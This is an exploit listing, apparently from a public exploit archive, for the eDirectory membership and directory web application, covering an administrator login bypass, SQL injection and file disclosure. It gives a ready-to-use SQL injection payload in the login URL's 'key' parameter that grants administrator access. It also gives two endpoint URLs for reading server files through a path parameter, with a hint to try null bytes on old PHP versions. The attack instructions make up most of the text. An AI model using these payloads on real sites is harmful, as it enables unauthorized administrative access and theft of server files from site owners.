Exploits / Vulnerability Discovered : 2019-02-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Edirectory sql injection is for educational purposes only and if it is used you will do on your own risk!
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# Exploit Title: Admin auth bypass, SQLi and File Disclosure
# Google Dork: no defacers please !
# Date: March 2019 (reported to vendor without response :D)
# Exploit Author: Efren Diaz
# Author contact: https://twitter.com/elefr3n
# Vendor Homepage: https://www.edirectory.com/
# Software Link: not available
# Version: All versions
# Tested on: Ubuntu 14.04
# CVE : none
eDirectory is a software to create your own membership website, business directories, yellow pages, coupon sites, local guide, lead gen sites and more.
# Administrator Login Bypass
The login SQL injection can be useful for us to make a union SQL injection to avoid the administrator authentication and get access to the dashboard correctly. Sometimes you get a "Invalid key error", but the web application set to you correctly the cookie, if you got that error press F5 and you will be authenticated as an administrator
Link: https://site.com/sitemgr/login.php?key=' union select 0,1,0,'sitemgr' -- -
# File Disclosure (authenticated)
Note: only files with .php extension, but don't forget try null-byte in old php versions
- https://site.com/sitemgr/langcenter/language_file.php?language_area=front&domain_id=1&language_id=[PATH]
- https://site.com/sitemgr/configuration/geography/language/language_file.php?language_area=front&domain_id=1&language_id=[PATH]